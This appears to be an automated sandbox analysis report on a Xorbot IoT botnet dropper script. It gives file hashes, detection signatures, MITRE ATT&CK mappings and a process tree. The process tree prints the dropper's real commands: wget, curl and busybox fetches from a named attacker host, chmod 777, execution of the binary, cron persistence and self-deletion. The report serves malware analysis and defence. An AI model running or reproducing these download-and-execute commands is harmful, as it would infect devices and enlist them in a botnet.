xorbot | 27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
28/02/2025, 11:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

1c04224c31369b92267e0f914de6faa7
SHA1

a83724c5b8610fae0d070df43be47b501af8c44b
SHA256

27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f
SHA512

f84f0a3d4f25e30aa0b396a8212e44194c1787f5af184c2a20ded76d3b1dc36e52a38c1c8c16ea6d5263807375dbc8fdfc92de6b4f116b68f16650655288b542
SSDEEP

96:YjvjDjZLwsIL8AjnqinuOCaELKCsHA82U99vLv+vuvBGjm9gcSLwsFQMuBSBqBqs:S4H7qAKosvdGrDIF4

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (1461) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
708	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx	709	bins.sh

Renames itself 1 IoCs

pid	Process
710	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.TmQTub	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1001/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1017/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/20/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/41/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/813/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/826/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/919/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/976/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/980/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1072/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/11/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/25/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/893/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/356/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/756/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/933/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1027/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/80/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/784/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/883/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1011/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1041/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/794/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/801/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/872/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1053/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/26/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/657/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/748/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/810/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/916/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1020/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/821/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/884/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/947/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/953/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1029/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/19/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/852/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/912/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/943/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/969/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1005/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1015/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/659/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/741/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/805/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/807/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/815/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/965/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1026/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1065/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/782/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/799/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/834/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/844/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/885/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/940/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/990/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/997/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/800/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/850/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/1044/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
File opened for reading	/proc/43/cmdline	6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
666	wget
682	curl
692	busybox
736	wget

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx	wget
File opened for modification	/tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:660
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:662
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:666
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:682
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  2⤵
  - System Network Configuration Discovery
  PID:692
- /bin/chmod
  chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  2⤵
  - File and Directory Permissions Modification
  PID:708
- /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  ./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:709
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:711
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:713
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:715
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:716
- /bin/rm
  rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
  2⤵
  PID:733
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
  2⤵
  - System Network Configuration Discovery
  PID:736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/var/spool/cron/crontabs/tmp.TmQTub

Filesize
210B

MD5
7b98ab537f6f845edfbc8620f2fc5d7d

SHA1
24813d7bc40bb0b5e462c3deb0a7a63859b5b7e0

SHA256
d772d12593450198d104683ce374a3a7130fc147071a9b7e950f61265d0a4a2f

SHA512
b9ef53b1061fe7d69fba4bb8af60a1de25a5c48bd321dfa555bff04246f4375ac723f51c97b9ae516400d00fae4ab729845b7d22bf6143926aa3efa222212ec5

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads